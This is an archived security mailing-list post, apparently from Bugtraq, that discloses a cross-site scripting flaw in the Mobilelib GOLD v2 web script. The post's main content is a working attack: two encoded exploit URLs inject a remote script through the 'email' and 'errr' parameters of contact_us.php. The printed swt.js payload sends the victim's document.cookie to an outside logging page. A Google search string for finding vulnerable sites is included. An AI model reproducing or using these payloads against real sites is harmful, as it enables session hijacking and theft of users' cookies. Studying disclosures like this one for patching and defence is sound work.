Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

XSS in script Mobilelib GOLD v2

from [gamr-14] Network Security [Permanent Link]
Subject: XSS in script Mobilelib GOLD v2
Date: 28 Dec 2006 23:44:22 -0000 
/////////////////////////////////////
// XSS in script Mobilelib GOLD v2 //
////////////////////////////////////
Found By: viP HaCKEr
Tame : AL-GaRNi
Vendor: http://www.ac4p.com
Software: Mobilelib GOLD GOLD v2
google : "Powered by ac4p.com"
::::::::::::::::::::::::::::::::::::::
Description:

Line 32 of contact_us.php
:::::::::::::::::::::::::::::::::::::
code:
}
$html=getthemeM("show.tpl");
$html=eregi_replace("{marquee}","$Newnews",$html);
include("block.php");
$errr='';
function chek_mail($email)
   {
::::::::::::::::::::::::::::::::::::::
Exploits :

http://[target]/[path]/contact_us.php?email=%20%22%3E%3Cscript%20src%3Dhttp%3A//www.xxxx.com/swt.js%3E%3C/script%3E
  #

//and

http://[target]/[path]/contact_us.php?errr=%20%22%3E%3Cscript%20src%3Dhttp%3A//www.xxxx.com/swt.js%3E%3C/script%3E
   #
/****************************************************************//
//Content swt.js
location.href='http://www.yoursite.com/log.php?swt='+escape(document.cookie);  #

//End swt.js
############### Group AL-GaRNi ##################
/**********************************************#
/*SwEET-DeViL  &  viP HaCkEr  &   HaCkEr sUn *#
/********************************************#
#################(c)@2006####################
########## gamr-14@hotmail.com #############
########## Error-404@hotmail.com ##########
##########################################
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  [Full-disclosure] Information Security Behavior Management System, no me
Next by Date:  XSS with default page parameter in Oracle Portal 10g, duchaikhtn
Previous by Thread:  [Full-disclosure] Information Security Behavior Management System, no me
Next by Thread:  Re: XSS in script Mobilelib GOLD v2, gamr-14
Indexes:  [Date] [Thread] [Top] [All Lists]